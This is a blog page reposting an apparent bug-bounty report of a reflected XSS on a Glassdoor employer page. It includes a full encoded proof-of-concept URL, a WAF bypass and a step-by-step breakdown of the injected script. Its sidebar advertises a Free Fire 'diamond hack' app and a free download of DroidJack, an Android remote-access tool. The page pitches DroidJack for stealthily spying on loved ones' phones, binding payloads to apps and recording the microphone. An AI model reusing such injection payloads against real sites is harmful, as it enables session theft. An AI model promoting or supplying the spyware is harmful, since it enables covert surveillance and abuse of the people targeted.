Reflected XSS on Glassdoor.com

-

Reflected XSS on https://www.glassdoor.com/employers/sem-dual-lp/

 


Summary:

There is a reflected XSS on https://www.glassdoor.com/employers/sem-dual-lp/ through the utm_source parameter. By using URL encoding I was able to bypass the WAF.
Affected URL or select Asset from In-Scope: https://www.glassdoor.com/
Affected Parameter: utm_source
Vulnerability Type: XSS
Browsers tested: Firefox 75.0

Steps To Reproduce:

  1. Visit the following POC link:
1https://www.glassdoor.com/employers/sem-dual-lp/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

Explanation

The utm_source parameter is not escaped properly for URL encoded values. We can escape at multiple locations in the source. I escaped in the script section. The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag. Basically we can dissect it as follows:
Code 473 BytesUnwrap lines Copy Download
1abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e 2 3is url encoded for 4 5abc`;return+false});});alert`xss`;</script> 6 7which is used like 8 9abc`; Finish the string 10return+false}); Finish the jQuery click function 11}); Finish the jQuery ready function 12alert`xss`; Here we can execute our code 13</script> This closes the script tag to prevent JavaScript parsing errors

Supporting Material/References (screenshots, logs, videos):


Impact


A XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.

Comments

Post a Comment

Popular posts from this blog

Diamond Hack Website FF Latest December 19 2023 100% Working

-
Image
D iamond Hack FFMax Diamond Hack FFMax APK  for Android Free In English V  1.0 4.3 (126 ) APK Status Free Download for Android Free diamond tool for Free Fire Diamond Hack FFMax  is a free-to-use  utility  designed to help players better manage and grow their diamonds, a valuable in-game resource in the  battle royale  game,  Garena Free Fire . This third-party app makes quick  price checks and conversions  for you, checking different  locations  on your behalf. Aside from this economic tool, this app also offers a couple of game  optimization  options to improve your gameplay experience. Unlike other literal diamond hacking apps, Diamond Hack FFMax only helps players manage diamonds and improve game performance. It’s like a cross between  Love FF Diamond  and  GFX Tool - Free Fire Booster . Manage diamonds and optimize the game Despite the seeming misnomer, Diamond Hack FFMax  doesn’t hack into the game  in any form. Instead, it serves as a third-party platform that lets you  view dia
Read more

Java Runtime Setup for win10

-
JAVA RUNTIME ENVIRONMENT Java Runtime Environment  (JRE) allows you to play online games,  chat with people around the world , calculate your mortgage interest, and view images in 3D, just to name a few. It's also integral to the intranet applications and other e-business solutions that are the foundation of corporate computing. It provides the libraries, the Java Virtual Machine, and other components to run applets and applications written in the Java programming language. In addition, two key deployment technologies are part of the JRE: Java Plug-in, which  Enables Applets to Run in Popular Browsers ; and Web Start, which deploys standalone applications over a network. Many cross platform applications also require Java to operate properly. Itis a programming language and computing platform first released by Sun Microsystems in 1995. There are lots of applications and websites that will not work unless you have Java installed, and more are created every day. The program is f
Read more

DOWNLOAD DROIDJACK 4.4 FULL VERSION – REMOTE ADMINISTRATION TOOLS

-
Image
DOWNLOAD DROIDJACK 4.4 FULL VERSION – REMOTE ADMINISTRATION TOOLS There is nothing that you can do with a PC, you can’t do using an Android phone. Since the power in the hand has grown so much, a control over that power is also needed. DroidJack is what you need for that. DroidJack gives you the power to establish control over your beloveds’ Android devices with an easy to use GUI and all the features you need to monitor them. Build a custom APK or bind the payload to an already existing APK such as a game or social media app. Download droidjack 4.4 full version free of cost. FEATURES: Bind your server APK with any other Game or App. Explore Files with full access. Read/Write Messages. Make a call, record a call and browse call logs. Read and write contact list. Capture photos and videos. Listen live conversation through mic, record mic sound live. Check browser history. Get GPS Location. Check installed apps. Get phone’s information (IMEI, WIFI MAC, PHONE CARRIER). Fully Stealth. DOWN
Read more